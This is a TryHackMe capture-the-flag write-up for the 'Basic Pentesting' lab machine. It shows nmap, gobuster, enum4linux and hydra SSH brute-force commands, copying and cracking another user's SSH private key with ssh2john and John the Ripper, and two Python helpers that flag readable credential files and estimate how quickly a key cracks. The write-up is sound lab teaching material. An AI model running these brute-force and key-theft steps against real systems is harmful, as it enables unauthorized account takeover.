Basic Pentesting - THM Write-Up


Difficulty - Easy

Description from THM

This is a machine that allows you to practice web app hacking and privilege escalation.

This is a beginner-friendly room on TryHackMe. There are several tasks in this CTF that need to be completed; I'll answer them along the way. The purpose of this machine is to practise brute forcing, hash cracking, service enumeration, and Linux enumeration.


Tools

  • Nmap
  • gobuster
  • enum4linux
  • hydra
  • ssh2john
  • John the Ripper

Task 1

This task is to just deploy the machine and connect to the THM network.

Task 2

The first thing we're going to do is run an Nmap scan of the target machine to find what services are running on it.

nmap -sC -sV -oA basic 10.10.195.240

  • -sC - run the default NSE scripts against whatever is found open
  • -sV - probe open ports for service and version information
  • -oA - save the output in all three formats (normal, XML, grepable) using the basename "basic"

Starting Nmap 7.60 ( https://nmap.org ) at 2022-03-12 04:57 GMT
Nmap scan report for ip-10-10-195-240.eu-west-1.compute.internal (10.10.195.240)
Host is up (0.0015s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http        Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
MAC Address: 02:37:12:F3:96:43 (Unknown)
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are several open ports:

  • Port 22 - SSH
  • Port 80 - HTTP (Apache httpd 2.4.18)
  • Port 139 & 445 - SMB
  • Port 8009 - ajp13 (Apache Jserv)
  • Port 8080 - HTTP (Apache Tomcat)

They are all interesting, but let's focus on the web service on port 80 first. Note that this was nmap's default scan of the 1,000 most common TCP ports ("Not shown: 994 closed ports"); a full scan (-p-) would be needed to be sure nothing else is listening.

Task 3

For this task, we'll need to find the hidden directory on the web server.

If we browse to the web page, all we see is a message that says "Undergoing maintenance".

To find hidden directories, we'll use a tool called gobuster. It brute forces directory and file names on a web server by requesting every entry in a wordlist and reporting the ones that do not come back as 404.

To use gobuster, I'm going to run the following command:

gobuster dir -u http://<ip>:80 -w /usr/share/wordlists/dirb/common.txt

  • gobuster - starts the tool
  • dir - used to bruteforce directory/files
  • -u - the target URL
  • -w - path to the wordlist
gobuster dir -u http://10.10.195.240:80 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.195.240:80
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2022/03/12 05:24:34 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/development (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2022/03/12 05:24:34 Finished
===============================================================

Everything besides /development and /index.html came back 403 (Forbidden). That is Apache's default behaviour for .ht* files and for /server-status, so those are not leads. index.html is just the main page we saw that said "Undergoing maintenance". The 301 on /development is Apache redirecting to /development/, so that is the directory to explore.


The /development directory lists two text files. Opening dev.txt, we get what looks like developer notes: two people are leaving each other messages in the file, signing with the initials K and J:


Looking closer, "K" mentions messing around with Struts and says they are using version 2.5.12. Googling "struts 2.5.12" turns up an Exploit-DB entry as the first result:

Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution

We'll keep this in mind: the Tomcat instance on port 8080 would be the natural place for such an app to be hosted, although nothing so far confirms a Struts app is actually deployed there. Now, let's check the other text file, j.txt:


It's a message from "K" to "J": K has been auditing /etc/shadow for weak credentials and tells J that their password needs to be changed because it was easy to crack.

Tasks 4-7

We've discovered quite a bit by enumerating the web server, but let's continue: we still need to enumerate SMB (Samba).

A tool that we can use to enumerate smb is enum4linux. It is used to enumerate data from Windows and Samba hosts. We can use the following command:

enum4linux <machine ip>

After we run enum4linux, we can go through it and see what we can find that is useful.


We found two users, kay and jan, which explains the "K" and "J" in the text files. Now we need their passwords. Let's use hydra to run a dictionary attack against the SSH service.

Also, recall from j.txt that Kay told Jan their password is weak, so jan is the better first target for hydra.

We'll use the following command (it will take a bit to complete):

hydra -t 4 -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.195.240

  • hydra - starts the tool
  • -t - number of parallel connections per target (4 here; SSH servers often drop connections if you go much higher, and hydra itself recommends -t 4 for ssh)
  • -l - sets user (in this case jan)
  • -P - path to wordlist
  • ssh:// - remember from the nmap scan the target is running ssh. So, this will brute force the ssh login.
[22][ssh] host: 10.10.195.240   login: jan   password: <password here>

I've omitted the password because I believe in attempting it yourself. If you've done the enumerating and scans correctly you should get the same results.

We have the password, so let's try logging in over SSH with our newly found credentials.

We will use the following command to login:

ssh jan@<ip>

jan@basic2:~$ whoami
jan

Tasks 8-11

We'll need to further enumerate the machine to find any vectors for privilege escalation.

Let's look around and see what we can find.

jan@basic2:~$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 root jan    47 Apr 23  2018 .lesshst
jan@basic2:~$ cd ..
jan@basic2:/home$ ls
jan  kay
jan@basic2:/home$ cd kay
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   756 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo

Kay's home directory looks promising. pass.bak is mode 600 and owned by kay, so we can't read it yet, but the .ssh directory is world-listable. Let's look in there.
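Before poking at files one by one, it helps to work out from the listing alone which entries our current user can actually read. The following is an added example, not code from the original write-up: it parses the /home/kay listing shown above (copied from the page into LISTING) and applies the owner/group/other permission check for a given user. jan's group membership (only the `jan` group) is an assumption, and the name patterns in CRED_RE are just a pentester's rule of thumb for files worth reading first.

```python
"""Triage an `ls -la` listing of another user's home directory: which entries
can our current user actually read?  Added example, not part of the original
write-up.  LISTING is the /home/kay listing from the page; jan being a member
of only the `jan` group is an assumption."""
import re

LISTING = """\
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   756 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo
"""

# type, 9 permission bits, link count, owner, group, size, month, day, time-or-year, name
LINE_RE = re.compile(
    r"^([-dl])([rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\w+\s+\d+\s+[\d:]+\s+(.+)$")

# Names that usually hold credentials or keys (rule of thumb, not exhaustive).
CRED_RE = re.compile(r"pass|\.bak$|history|id_rsa|id_ed25519|\.pem$|^\.ssh$")


def parse_listing(text):
    """Turn `ls -la` lines into dicts; skips 'total N' and anything unparsable."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            kind, perms, owner, group, name = m.groups()
            entries.append({"name": name, "is_dir": kind == "d", "perms": perms,
                            "owner": owner, "group": group})
    return entries


def can_read(entry, user, groups):
    """UNIX access check: owner bits if we own it, else group bits if we are in
    its group, else the 'other' bits.  (root is not special-cased here.)"""
    perms = entry["perms"]
    if entry["owner"] == user:
        bits = perms[0:3]
    elif entry["group"] in groups:
        bits = perms[3:6]
    else:
        bits = perms[6:9]
    return "r" in bits


def readable_by(text, user, groups=()):
    """Names in the listing that `user` can read (or list, for directories)."""
    return [e["name"] for e in parse_listing(text)
            if e["name"] not in (".", "..") and can_read(e, user, groups)]


def loot_candidates(text, user, groups=()):
    """Readable entries whose names suggest credentials or SSH material."""
    return [n for n in readable_by(text, user, groups) if CRED_RE.search(n)]


if __name__ == "__main__":
    print("jan can read:", readable_by(LISTING, "jan", ("jan",)))
    print("worth a look:", loot_candidates(LISTING, "jan", ("jan",)))
    print("kay would see:", loot_candidates(LISTING, "kay", ("kay",)))
```

Run as jan, the only credential-looking entry that survives the permission check is the world-listable .ssh directory; pass.bak and .bash_history only become readable once we are kay, which is exactly the pivot the rest of the write-up takes.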

jan@basic2:/home/kay$ cd .ssh
jan@basic2:/home/kay/.ssh$ ls
authorized_keys  id_rsa  id_rsa.pub

Looking in the .ssh folder we can see Kay's private key, id_rsa, and it is readable by us. We can copy it off the box and try to crack its passphrase with John the Ripper, but first we need ssh2john: it converts the encrypted key file into a hash format that john can attack.

We'll use the following command to convert id_rsa to hash format (my file location may differ from yours: I'm using the THM AttackBox, where ssh2john lives under /opt/john; on Kali it is /usr/share/john/ssh2john.py, or you may need to install john):

python3 /opt/john/ssh2john.py id_rsa > id_rsa.hash

Now we can run john:

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash 

<password here>          (id_rsa)
1g 0:00:00:09 DONE (2022-03-12 06:51) 0.1086g/s 1558Kp/s 1558Kc/s 
Session completed.
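It is worth knowing why this key cracked in nine seconds. The following is an added example, not code from the original write-up: it parses a private key file the way ssh2john has to, to tell whether the key is passphrase-protected at all and which cipher and key-derivation function guard it. Legacy PEM keys (the `-----BEGIN RSA PRIVATE KEY-----` format seen here) derive the cipher key with OpenSSL's MD5-based EVP_BytesToKey, so john can test millions of candidates per second; modern `openssh-key-v1` keys use a bcrypt KDF with a tunable round count and crack far more slowly. The sample keys are constructed (dummy zero key material), not kay's real id_rsa.

```python
"""Inspect an OpenSSH private key before handing it to ssh2john/john: is it
passphrase-protected, and which cipher and KDF guard it?  Added example, not
code from the original write-up; the sample keys are constructed (dummy zero
key material), not kay's real id_rsa."""
import base64
import struct

PEM_BEGIN, PEM_END = "-----BEGIN ", "-----END "


def _ssh_string(b):
    """Encode bytes as an SSH wire-format string (uint32 big-endian length + data)."""
    return struct.pack(">I", len(b)) + b


def _read_string(buf, off):
    """Decode an SSH wire-format string at offset `off`; return (data, new offset)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def _pem_body(text):
    """Split PEM armour into (label, RFC 1421 headers, decoded bytes)."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if not lines or not lines[0].startswith(PEM_BEGIN) or not lines[-1].startswith(PEM_END):
        raise ValueError("not a PEM-armoured key")
    label = lines[0][len(PEM_BEGIN):].rstrip("-")
    headers, body = {}, []
    for ln in lines[1:-1]:
        if ":" in ln and not body:        # headers come before the base64 body
            key, val = ln.split(":", 1)
            headers[key.strip()] = val.strip()
        elif ln:
            body.append(ln)
    return label, headers, base64.b64decode("".join(body))


def inspect_key(text):
    """Return {format, cipher, kdf, rounds, encrypted} for a private key file."""
    label, headers, raw = _pem_body(text)
    if label == "OPENSSH PRIVATE KEY":
        # openssh-key-v1 layout: magic | ciphername | kdfname | kdfoptions | nkeys | ...
        magic = b"openssh-key-v1\x00"
        if not raw.startswith(magic):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _read_string(raw, len(magic))
        kdf, off = _read_string(raw, off)
        kdfopts, off = _read_string(raw, off)
        rounds = None
        if kdf == b"bcrypt":              # kdfoptions = string salt | uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh-key-v1", "cipher": cipher.decode(),
                "kdf": kdf.decode(), "rounds": rounds, "encrypted": cipher != b"none"}
    # Legacy PEM (RSA/DSA/EC PRIVATE KEY): encryption is signalled only by the
    # Proc-Type/DEK-Info headers, and the cipher key comes from OpenSSL's
    # MD5-based EVP_BytesToKey, which is why john tests these keys so quickly.
    encrypted = headers.get("Proc-Type") == "4,ENCRYPTED"
    cipher = headers.get("DEK-Info", "none").split(",")[0] if encrypted else "none"
    return {"format": "pem", "cipher": cipher,
            "kdf": "EVP_BytesToKey-MD5" if encrypted else "none",
            "rounds": None, "encrypted": encrypted}


def crack_cost(info):
    """Rough triage of how expensive a wordlist attack on this key will be."""
    if not info["encrypted"]:
        return "no passphrase: use it directly with ssh -i"
    if info["format"] == "pem":
        return "fast: one MD5-based derivation per guess"
    return "slow: bcrypt KDF with %d rounds per guess" % info["rounds"]


def make_openssh_key(cipher=b"aes256-ctr", kdf=b"bcrypt", rounds=16):
    """Build a minimal openssh-key-v1 container as a constructed sample (the key
    material is zeros, so it is not a usable key)."""
    kdfopts = (_ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)) if kdf == b"bcrypt" else b""
    blob = (b"openssh-key-v1\x00" + _ssh_string(cipher) + _ssh_string(kdf)
            + _ssh_string(kdfopts) + struct.pack(">I", 1)
            + _ssh_string(b"\x00" * 32) + _ssh_string(b"\x00" * 64))
    b64 = base64.b64encode(blob).decode()
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
            + "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


# Constructed legacy-format sample, shaped like a passphrase-protected key
# written with `ssh-keygen -m PEM`; the body is dummy bytes, not a real key.
LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0A1B2C3D4E5F60718293A4B5C6D7E8F9

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for name, key in [("legacy PEM", LEGACY_PEM),
                      ("openssh bcrypt", make_openssh_key()),
                      ("openssh unencrypted", make_openssh_key(b"none", b"none"))]:
        info = inspect_key(key)
        print(name, info, "->", crack_cost(info))
```

The practical lesson for a defender is the mirror image of the attacker's: a key written in the legacy PEM format, or one with no passphrase at all, is only as safe as the file permissions around it, and here those permissions let jan read it.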

John recovers the passphrase protecting Kay's private key. Let's use the key to log in as Kay.

jan@basic2:/home/kay/.ssh$ ssh -i id_rsa kay@10.10.195.240
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.10.195.240 (10.10.195.240)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
Enter passphrase for key 'id_rsa':

The warnings about /home/jan/.ssh are harmless: jan's home directory is owned by root (see the listing earlier), so ssh cannot save the host key there. Where it asks for the passphrase, enter the one john just recovered. After that, we have a shell as Kay.

kay@basic2:~$ whoami
kay
kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak 
<final password here>

We're done! We found the final password, sitting in a backup file that only kay could read.

Summary

After solving this TryHackMe machine we learned how to scan our target to see which services were running on it. We used what we found to enumerate the web server, SMB, and SSH, and got a chance to use brute-forcing tools to continue enumerating the target. We discovered a possibly vulnerable Apache Struts version along the way; we didn't end up using it, but it was a cool find. We also found developer notes that weren't meant for our eyes. Then we dealt with weak passwords, which gave us a chance to practise password and passphrase cracking. In the end, using the information we gathered, we were able to move from jan to kay and recover the final password.